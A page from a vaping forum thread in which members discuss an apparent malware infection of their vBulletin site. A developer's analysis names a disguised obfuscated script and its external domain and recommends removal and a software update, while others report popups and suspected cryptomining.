Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 27
Like Tree64Likes

Thread: AVF is infected with Malware

  1. #11
    AVF Regular
    Join Date
    Mar 2013
    Location
    Adelaide
    Posts
    639
    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.
    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.
    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.
    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.
    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:
    https://www.mcafee.com/threat-intell...pushnative.com
    I would say this script is definitely malware as its disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).
    All the legit scripts are easily readable and have header information, whereas this script looks like its been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).
    This script isn’t run if you are logged in, it only appears in the client side scripts folder when first visiting the site.
    While typing this the browser on my test machine has crashed twice since visiting the forum home page.
    I’m not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then its clear that AussieVapers has been hacked sometime in the last few months.
    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.
    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:
    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Wow, looks like you had a little fun writing that one up!
    Fatman, Dogamondo and DocM like this.

  2. #12
    Super Moderator
    Join Date
    Aug 2012
    Location
    Central Vic,up near the Murray
    Posts
    17,896
    Excellent detective work Dogamundo !!!
    I stand corrected
    ( see folks told you I was wrong lol )

    I have emailed your response to Jato for his info ... hopefully it gets sorted

    Cheers folks ... unfortunately us mods are not in the position to do anything about it so fingers crossed !
    EPM V2-18490 (X2 ),GP Spheroid V2.5 and GP Piccolo V2.5 ,BBCB, Provari mini's, REO mini V2.1, 18490 REO , Jazz Carto Pipes ( fitted with GA tank and churchwarden stem Totally Evil!!! ), Meerschaum pipe ,e-holly35W,Phideas, AIOS,Taifun atties, PC Pipe mods.PC Squonker, Svapiamo squonker, GP Paps Heron combo.

    Vaping since 2007 totally smoke free since 2011


    AVF Rules , Read and understand them

  3. #13
    AVF Regular
    Join Date
    Feb 2017
    Location
    Sydney
    Posts
    884
    Hahahah... So happy a JS dude looked into this. And you are right this started happening a few months back. Remembered everyone hammering FM to hassle Jato to fix the issue. hahahahah

    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.

    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.

    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.

    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.

    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:

    https://www.mcafee.com/threat-intell...pushnative.com

    I would say this script is definitely malware as its disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).

    All the legit scripts are easily readable and have header information, whereas this script looks like its been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).

    This script isnít run if you are logged in, it only appears in the client side scripts folder when first visiting the site.

    While typing this the browser on my test machine has crashed twice since visiting the forum home page.

    Iím not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then its clear that AussieVapers has been hacked sometime in the last few months.

    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.

    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:

    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Dogamondo likes this.


  4. #14
    AVF Regular
    Join Date
    Jan 2014
    Location
    victoria
    Posts
    5,676
    Just wondering is malware the only thing infecting AVF? Have noticed particularly in the past 2-3 days that AVF numbers are well down - it has been extremely rare over the last few years to see only 3-5 members online and numbers reading as online are really well down from what they are normally -but we have been getting it none the less - Is something else happening or has the malware gotten worse?
    Last edited by rebelagainstthemachine; 16-11-17 at 08:43 AM.
    Danny76 likes this.
    "I thought I was just in a bad mood- but its been a few years ...so I guess that's who I am now"

    Comic Database: Steve Hughes... Offended?
    https://www.youtube.com/watch?v=fHMoDt3nSHs











  5. #15
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    Quote Originally Posted by rebelagainstthemachine View Post
    Is something else happening
    something else is happening something is using all the cpu horse power on the main page

    home page loaded

    home page not loaded
    If you know it. Help someone
    If you dont know it. Ask


    On land line is a inanimate object under water it has a life of its own.

  6. #16
    Super Moderator
    Join Date
    Aug 2012
    Location
    Central Vic,up near the Murray
    Posts
    17,896
    Seems we may have picked up a new hitch-hiker ... I just emailed Jato about it ... thats the limit of what I can do sadly .
    EPM V2-18490 (X2 ),GP Spheroid V2.5 and GP Piccolo V2.5 ,BBCB, Provari mini's, REO mini V2.1, 18490 REO , Jazz Carto Pipes ( fitted with GA tank and churchwarden stem Totally Evil!!! ), Meerschaum pipe ,e-holly35W,Phideas, AIOS,Taifun atties, PC Pipe mods.PC Squonker, Svapiamo squonker, GP Paps Heron combo.

    Vaping since 2007 totally smoke free since 2011


    AVF Rules , Read and understand them

  7. #17
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    could be a mining software or something

    also i reckon we should all get his email and push to fix or release the admin log in to someone so we dont have these issues
    If you know it. Help someone
    If you dont know it. Ask


    On land line is a inanimate object under water it has a life of its own.

  8. #18
    AVF Regular
    Join Date
    Aug 2016
    Location
    Sydney
    Posts
    850
    ABP addon for FireFox has helped keep the MALWARE away for me. ABP reported 4 stopped today.

  9. #19
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    Quote Originally Posted by chris_vaper View Post
    ABP addon for FireFox has helped keep the MALWARE away for me. ABP reported 4 stopped today.
    cant stop a mining software
    If you know it. Help someone
    If you dont know it. Ask


    On land line is a inanimate object under water it has a life of its own.

  10. #20
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    well we are being used to crypto currency mine

    If you know it. Help someone
    If you dont know it. Ask


    On land line is a inanimate object under water it has a life of its own.

 

 
Page 2 of 3 FirstFirst 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Powered by vBulletin® Version 4.2.4
Copyright © 2018 vBulletin Solutions, Inc. All rights reserved.
Search Engine Friendly URLs by vBSEO 3.6.0
All times are GMT +11. The time now is 01:04 AM.